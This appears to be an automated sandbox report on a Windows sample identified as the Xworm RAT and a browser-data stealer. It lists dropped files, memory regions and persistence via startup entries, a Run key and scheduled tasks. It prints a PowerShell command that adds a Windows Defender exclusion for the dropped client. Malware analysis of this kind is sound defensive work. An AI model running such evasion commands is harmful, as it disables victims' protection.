SHA256 770d04ebe9f4d8271659ba9bf186b8ae422fdd76f7293dbc84be78d9d6dd92cc
SHA512 d6c7a90b8fa017f72f499943d73e4015f2eec0e46188c27848892a99be35e0ecbda1f692630863b89109b04636e813ddad2051f323a24b4d373192a6b67cf978

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_asyncio.pyd

MD5 b72e9a2f4d4389175e96cd4086b27aac
SHA1 2acfa17bb063ee9cf36fadbac802e95551d70d85
SHA256 f9924bbead1aca98422ba421f5139a4c147559aae5928dfd2f6aada20cb6bb42
SHA512 b55f40451fa9bdd62c761823613fcfe734aaa28e26fb02a9620ad39ab7539c9257eac8cc10d4a3f2390c23a4d951cc02d695498530a4c1d91b4e51e625316e06

C:\Users\Admin\AppData\Local\Temp\_MEI35042\VCRUNTIME140_1.dll

MD5 f8dfa78045620cf8a732e67d1b1eb53d
SHA1 ff9a604d8c99405bfdbbf4295825d3fcbc792704
SHA256 a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5
SHA512 ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

C:\Users\Admin\AppData\Local\Temp\_MEI35042\unicodedata.pyd

MD5 4253cde4d54e752ae54ff45217361471
SHA1 06aa069c348b10158d2412f473c243b24d6fc7bc
SHA256 67634e2df60da6b457e4ebfbae3edb1f48d87752221600a5814b5e8f351166e6
SHA512 3b714a57747eddf39fc3a84ab3ca37cc0b8103dd3f987331ffb2d1d46f9a34f3793bb0493c55e02ab873314c8990eaebdd0284ad087a651c06a7f862b1a61c80

C:\Users\Admin\AppData\Local\Temp\_MEI35042\sqlite3.dll

MD5 8776a7f72e38d2ee7693c61009835b0c
SHA1 677a127c04ef890e372d70adc2ab388134753d41
SHA256 c467fcc7377b4a176e8963f54ffff5c96d1eb86d95c4df839af070d6d7dbf954
SHA512 815bf905fa9a66c05e5c92506d2661c87559c6205c71daa205368dbfd3d56b8a302a4d31729bc6d4c1d86cbcf057638aa17bde0d85ccc59ce1cbcb9e64349732

C:\Users\Admin\AppData\Local\Temp\_MEI35042\pyexpat.pyd

MD5 edcb8f65306461e42065ac6fc3bae5e7
SHA1 4faa04375c3d2c2203be831995403e977f1141eb
SHA256 1299da117c98d741e31c8fb117b0f65ae039a4122934a93d0bbb8dfbddd2dcd7
SHA512 221e6e1eb9065f54a48040b48f7b6109853306f04506ccf9ecb2f5813a5bd9675c38565a59e72770bf33d132977aa1558cc290720e39a4f3a74a0e7c2a3f88fa

C:\Users\Admin\AppData\Local\Temp\_MEI35042\libssl-3.dll

MD5 9b8d3341e1866178f8cecf3d5a416ac8
SHA1 8f2725b78795237568905f1a9cd763a001826e86
SHA256 85dd8c17928e78c20cf915c1985659fe99088239793f2bd46acb31a3c344c559
SHA512 815abc0517f94982fc402480bba6e0749f44150765e7f8975e4fcbfce62c4a5ff741e39e462d66b64ba3b804bd5b7190b67fff037d11bb314c7d581cfa6097a8

C:\Users\Admin\AppData\Local\Temp\_MEI35042\libcrypto-3.dll

MD5 e68a459f00b05b0bd7eafe3da4744aa9
SHA1 41565d2cc2daedd148eeae0c57acd385a6a74254
SHA256 3fcf6956df6f5dc92b2519062b40475b94786184388540a0353f8a0868413648
SHA512 6c4f3747af7be340a3db91e906b949684a39cafc07f42b9fcc27116f4f4bf405583fc0db3684312b277d000d8e6a566db2c43601fa2af499700319c660ef1108

memory/4544-157-0x00007FFE7EAC0000-0x00007FFE7EACF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI35042\libffi-8.dll

MD5 bb1feaa818eba7757ada3d06f5c57557
SHA1 f2de5f06dc6884166de165d34ef2b029bb0acf8b
SHA256 a7ac89b42d203ad40bad636ad610cf9f6da02128e5a20b8b4420530a35a4fb29
SHA512 95dd1f0c482b0b0190e561bc08fe58db39fd8bb879a2dec0cabd40d78773161eb76441a9b1230399e3add602685d0617c092fff8bf0ab6903b537a9382782a97

memory/4544-191-0x00007FFE699C0000-0x00007FFE699F3000-memory.dmp

memory/4544-193-0x00007FFE69E20000-0x00007FFE69EED000-memory.dmp

memory/4544-196-0x00007FFE69490000-0x00007FFE699B9000-memory.dmp

memory/4544-197-0x0000024081080000-0x00000240815A9000-memory.dmp

memory/3844-208-0x0000021D455C0000-0x0000021D455E2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l5e1xcgp.qnd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4992-211-0x00007FFE6DE90000-0x00007FFE6E951000-memory.dmp

memory/4544-214-0x00007FFE69A20000-0x00007FFE69A32000-memory.dmp

memory/4544-218-0x00007FFE7EAD0000-0x00007FFE7EAF5000-memory.dmp

memory/4544-217-0x00007FFE68CC0000-0x00007FFE68CE4000-memory.dmp

memory/4544-220-0x00007FFE67FB0000-0x00007FFE68126000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI35042\psutil\_psutil_windows.pyd

MD5 d2ab09582b4c649abf814cdce5d34701
SHA1 b7a3ebd6ff94710cf527baf0bb920b42d4055649
SHA256 571115cca942bc76010b379df5d28afcb0f0d0de65a3bac89a95c6a86838b983
SHA512 022ccaeb99dc08997d917f85c6bc3aefdad5074c995008942a2f35f46ba07d73bb5bc7bc971ec71cb0e60dcb096b2c990866fe29c57670d069e7bdc3b14f6172

memory/4544-223-0x00007FFE69A00000-0x00007FFE69A18000-memory.dmp

memory/4544-225-0x00007FFE68B60000-0x00007FFE68B74000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI35042\charset_normalizer\md.cp312-win_amd64.pyd

MD5 21898e2e770cb9b71dc5973dd0d0ede0
SHA1 99de75d743f6e658a1bec52419230690b3e84677
SHA256 edd490bec8ec903cdbf62f39e0675181e50b7f1df4dc48a3e650e18d19804138
SHA512 dc8636d817ae1199200c24ac22def5d12642db951b87f4826015fd1d5c428d45410ce3b7f5bb5aaaa05deecf91d954b948f537bd6fa52a53364ab3609caac81d

C:\Users\Admin\AppData\Local\Temp\_MEI35042\charset_normalizer\md__mypyc.cp312-win_amd64.pyd

MD5 4e5cd67d83f5226410ef9f5bc6fddab9
SHA1 dd75f79986808ff22f1049680f848a547ba7ab84
SHA256 80645609f9a48a8aaf988fa667f5aa32445e32f8027f61b27884d738ad608ae4
SHA512 e52eb7b51562a336c73c6b5b8a1ae821a7c2ad0145633858fc78d6af1a27d8f57ba59cfffa84a376f59d5362a19a7cc09fa1f691c7b50b3ac27c439781a42ba0

memory/4544-232-0x00007FFE6A4E0000-0x00007FFE6A507000-memory.dmp

memory/4544-235-0x00007FFE68260000-0x00007FFE6837B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI35042\Cryptodome\Cipher\_raw_ecb.pyd

MD5 1a48e6e2a3243a0e38996e61f9f61a68
SHA1 488a1aa38cd3c068bdf24b96234a12232007616c
SHA256 c7b01a0290bc43910ee776bd90de05e37b77f5bd33feaf7d38f4c362e255e061
SHA512 d7acd779b7cab5577289511f137dc664966fcaac39748e33ca4d266a785b17766106944df21c8f2452fd28e008529f3e0097282ad3c69f1069a93df25c6da764

C:\Users\Admin\AppData\Local\Temp\_MEI35042\Cryptodome\Cipher\_raw_cbc.pyd

MD5 e0dd54d1a4a8b3f4a2b7fb67bc2e6297
SHA1 b184c2ed3dd46d527df992ffe0c57ef8eb364eea
SHA256 b6b7cce003744af2342afef0f2536cdbbccd3a271f15f72aefc740332312281e
SHA512 960f3e6e3a6168ba65d690cb9c94541de8f5a8afb456b5db8d7c0392d0d935cf47245eb88160606be12d54c32f1dc1e1ebf7c6049a310654847e0d473d1726a6

memory/4544-234-0x00007FFE699C0000-0x00007FFE699F3000-memory.dmp

memory/4544-231-0x00007FFE7F4E0000-0x00007FFE7F4EB000-memory.dmp

memory/4544-230-0x00007FFE7EAB0000-0x00007FFE7EABD000-memory.dmp

memory/4544-216-0x00007FFE6A580000-0x00007FFE6AC59000-memory.dmp

memory/4544-249-0x00007FFE6A1B0000-0x00007FFE6A1BC000-memory.dmp

memory/4544-256-0x00007FFE6A150000-0x00007FFE6A15C000-memory.dmp

memory/4544-255-0x00007FFE68B40000-0x00007FFE68B52000-memory.dmp

memory/4544-254-0x00007FFE6A160000-0x00007FFE6A16D000-memory.dmp

memory/4544-253-0x00007FFE6A170000-0x00007FFE6A17C000-memory.dmp

memory/4544-252-0x00007FFE6A180000-0x00007FFE6A18C000-memory.dmp

memory/4544-263-0x00007FFE7EAD0000-0x00007FFE7EAF5000-memory.dmp

memory/4544-282-0x00007FFE6A4E0000-0x00007FFE6A507000-memory.dmp

memory/4544-278-0x00007FFE67FB0000-0x00007FFE68126000-memory.dmp

memory/4544-277-0x00007FFE68CC0000-0x00007FFE68CE4000-memory.dmp

memory/4544-296-0x0000024081080000-0x00000240815A9000-memory.dmp

memory/4544-273-0x00007FFE69490000-0x00007FFE699B9000-memory.dmp

memory/4544-299-0x00007FFE684B0000-0x00007FFE684DE000-memory.dmp

memory/4544-298-0x00007FFE684E0000-0x00007FFE68509000-memory.dmp

memory/4544-297-0x00007FFE65170000-0x00007FFE653F3000-memory.dmp

memory/4544-279-0x00007FFE69A00000-0x00007FFE69A18000-memory.dmp

memory/4544-262-0x00007FFE6A580000-0x00007FFE6AC59000-memory.dmp

memory/4544-251-0x00007FFE6A190000-0x00007FFE6A19B000-memory.dmp

memory/4544-250-0x00007FFE6A1A0000-0x00007FFE6A1AB000-memory.dmp

memory/4544-248-0x00007FFE6A1C0000-0x00007FFE6A1CE000-memory.dmp

memory/4544-247-0x00007FFE6A1D0000-0x00007FFE6A1DC000-memory.dmp

memory/4544-246-0x00007FFE6A1E0000-0x00007FFE6A1EC000-memory.dmp

memory/4544-245-0x00007FFE6A1F0000-0x00007FFE6A1FB000-memory.dmp

memory/4544-244-0x00007FFE6A200000-0x00007FFE6A20C000-memory.dmp

memory/4544-243-0x00007FFE6A4C0000-0x00007FFE6A4CB000-memory.dmp

memory/4544-242-0x00007FFE6A4D0000-0x00007FFE6A4DC000-memory.dmp

memory/4544-241-0x00007FFE700D0000-0x00007FFE700DB000-memory.dmp

memory/4544-240-0x00007FFE7F4D0000-0x00007FFE7F4DB000-memory.dmp

memory/4544-239-0x00007FFE69E20000-0x00007FFE69EED000-memory.dmp

memory/4544-213-0x00007FFE68D50000-0x00007FFE68D85000-memory.dmp

memory/4544-212-0x00007FFE69A80000-0x00007FFE69A96000-memory.dmp

memory/4544-406-0x00007FFE67FB0000-0x00007FFE68126000-memory.dmp

memory/4544-407-0x00007FFE69A00000-0x00007FFE69A18000-memory.dmp

memory/4544-400-0x00007FFE69E20000-0x00007FFE69EED000-memory.dmp

memory/4544-399-0x00007FFE699C0000-0x00007FFE699F3000-memory.dmp

memory/4544-401-0x00007FFE69490000-0x00007FFE699B9000-memory.dmp

memory/4992-427-0x000000001AE20000-0x000000001AE30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FzzW7EsRxv\Browser\history.txt

MD5 5638715e9aaa8d3f45999ec395e18e77
SHA1 4e3dc4a1123edddf06d92575a033b42a662fe4ad
SHA256 4db7f6559c454d34d9c2d557524603c3f52649c2d69b26b6e8384a3d179aeae6
SHA512 78c96efab1d941e34d3137eae32cef041e2db5b0ebbf883e6a2effa79a323f66e00cfb7c45eb3398b3cbd0469a2be513c3ff63e5622261857eefc1685f77f76b

C:\Users\Admin\AppData\Local\Temp\FzzW7EsRxv\Browser\cc's.txt

MD5 5aa796b6950a92a226cc5c98ed1c47e8
SHA1 6706a4082fc2c141272122f1ca424a446506c44d
SHA256 c4c83da3a904a4e7114f9bd46790db502cdd04800e684accb991cd1a08ee151c
SHA512 976f403257671e8f652bf988f4047202e1a0fd368fdb2bab2e79ece1c20c7eb775c4b3a8853c223d4f750f4192cd09455ff024918276dc1dd1442fa3b36623ad

memory/4544-474-0x00007FFE7FA20000-0x00007FFE7FA2F000-memory.dmp

memory/4544-514-0x00007FFE7EAC0000-0x00007FFE7EACF000-memory.dmp

memory/4544-519-0x00007FFE7EA30000-0x00007FFE7EA3D000-memory.dmp

memory/4544-522-0x00007FFE69E20000-0x00007FFE69EED000-memory.dmp

memory/4544-521-0x00007FFE699C0000-0x00007FFE699F3000-memory.dmp

memory/4544-520-0x00007FFE7E780000-0x00007FFE7E78D000-memory.dmp

memory/4544-518-0x00007FFE75710000-0x00007FFE75729000-memory.dmp

memory/4544-517-0x00007FFE7EAB0000-0x00007FFE7EABD000-memory.dmp

memory/4544-523-0x00007FFE69490000-0x00007FFE699B9000-memory.dmp

memory/4544-525-0x00007FFE68D50000-0x00007FFE68D85000-memory.dmp

memory/4544-548-0x00007FFE68B40000-0x00007FFE68B52000-memory.dmp

memory/4544-547-0x00007FFE6A160000-0x00007FFE6A16D000-memory.dmp

memory/4544-546-0x00007FFE6A170000-0x00007FFE6A17C000-memory.dmp

memory/4544-545-0x00007FFE6A180000-0x00007FFE6A18C000-memory.dmp

memory/4544-544-0x00007FFE6A190000-0x00007FFE6A19B000-memory.dmp

memory/4544-543-0x00007FFE6A1A0000-0x00007FFE6A1AB000-memory.dmp

memory/4544-542-0x00007FFE6A1B0000-0x00007FFE6A1BC000-memory.dmp

memory/4544-541-0x00007FFE6A1C0000-0x00007FFE6A1CE000-memory.dmp

memory/4544-540-0x00007FFE6A1D0000-0x00007FFE6A1DC000-memory.dmp

memory/4544-539-0x00007FFE6A1E0000-0x00007FFE6A1EC000-memory.dmp

memory/4544-538-0x00007FFE6A1F0000-0x00007FFE6A1FB000-memory.dmp

memory/4544-537-0x00007FFE6A200000-0x00007FFE6A20C000-memory.dmp

memory/4544-536-0x00007FFE6A4C0000-0x00007FFE6A4CB000-memory.dmp

memory/4544-535-0x00007FFE6A4D0000-0x00007FFE6A4DC000-memory.dmp

memory/4544-534-0x00007FFE700D0000-0x00007FFE700DB000-memory.dmp

memory/4544-533-0x00007FFE7F4D0000-0x00007FFE7F4DB000-memory.dmp

memory/4544-532-0x00007FFE68260000-0x00007FFE6837B000-memory.dmp

memory/4544-531-0x00007FFE6A4E0000-0x00007FFE6A507000-memory.dmp

memory/4544-530-0x00007FFE7F4E0000-0x00007FFE7F4EB000-memory.dmp

memory/4544-529-0x00007FFE68B60000-0x00007FFE68B74000-memory.dmp

memory/4544-528-0x00007FFE69A00000-0x00007FFE69A18000-memory.dmp

memory/4544-527-0x00007FFE67FB0000-0x00007FFE68126000-memory.dmp

memory/4544-526-0x00007FFE6A580000-0x00007FFE6AC59000-memory.dmp

memory/4544-524-0x00007FFE69A80000-0x00007FFE69A96000-memory.dmp

memory/4544-516-0x00007FFE75180000-0x00007FFE751AD000-memory.dmp

memory/4544-515-0x00007FFE7E710000-0x00007FFE7E729000-memory.dmp

memory/4544-513-0x00007FFE7EAD0000-0x00007FFE7EAF5000-memory.dmp

memory/4544-512-0x00007FFE68CC0000-0x00007FFE68CE4000-memory.dmp

memory/4544-511-0x00007FFE69A20000-0x00007FFE69A32000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-29 13:18

Reported

2024-04-29 13:20

Platform

win11-20240419-en

Max time kernel

57s

Max time network

53s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Output.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SoundPad.exe C:\Users\Admin\SoundPad.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Gorillatag client.lnk C:\Users\Admin\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Gorillatag client.lnk C:\Users\Admin\XClient.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\XClient.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\Gorillatag client.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-891789021-684472942-1795878712-1000\Software\Microsoft\Windows\CurrentVersion\Run\Gorillatag client = "C:\\Users\\Admin\\Gorillatag client.exe" C:\Users\Admin\XClient.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\XClient.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\SoundPad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Gorillatag client.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\XClient.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4628 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\Output.exe C:\Users\Admin\SoundPad.exe
PID 4628 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\Output.exe C:\Users\Admin\SoundPad.exe
PID 4628 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\Output.exe C:\Users\Admin\XClient.exe
PID 4628 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\Output.exe C:\Users\Admin\XClient.exe
PID 4688 wrote to memory of 4984 N/A C:\Users\Admin\SoundPad.exe C:\Users\Admin\SoundPad.exe
PID 4688 wrote to memory of 4984 N/A C:\Users\Admin\SoundPad.exe C:\Users\Admin\SoundPad.exe
PID 2072 wrote to memory of 4500 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2072 wrote to memory of 4500 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4984 wrote to memory of 2868 N/A C:\Users\Admin\SoundPad.exe C:\Windows\system32\cmd.exe
PID 4984 wrote to memory of 2868 N/A C:\Users\Admin\SoundPad.exe C:\Windows\system32\cmd.exe
PID 2868 wrote to memory of 3176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2868 wrote to memory of 3176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4984 wrote to memory of 2032 N/A C:\Users\Admin\SoundPad.exe C:\Windows\system32\cmd.exe
PID 4984 wrote to memory of 2032 N/A C:\Users\Admin\SoundPad.exe C:\Windows\system32\cmd.exe
PID 2032 wrote to memory of 2832 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2032 wrote to memory of 2832 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2072 wrote to memory of 3828 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2072 wrote to memory of 3828 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4984 wrote to memory of 2776 N/A C:\Users\Admin\SoundPad.exe C:\Windows\system32\cmd.exe
PID 4984 wrote to memory of 2776 N/A C:\Users\Admin\SoundPad.exe C:\Windows\system32\cmd.exe
PID 2776 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2776 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2072 wrote to memory of 4940 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2072 wrote to memory of 4940 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2776 wrote to memory of 1068 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2776 wrote to memory of 1068 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2072 wrote to memory of 2608 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2072 wrote to memory of 2608 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2776 wrote to memory of 2216 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2776 wrote to memory of 2216 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2776 wrote to memory of 544 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2776 wrote to memory of 544 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2072 wrote to memory of 4844 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\schtasks.exe
PID 2072 wrote to memory of 4844 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Output.exe

"C:\Users\Admin\AppData\Local\Temp\Output.exe"

C:\Users\Admin\SoundPad.exe

"C:\Users\Admin\SoundPad.exe"

C:\Users\Admin\XClient.exe

"C:\Users\Admin\XClient.exe"

C:\Users\Admin\SoundPad.exe

"C:\Users\Admin\SoundPad.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\XClient.exe'

C:\Windows\system32\cmd.exe

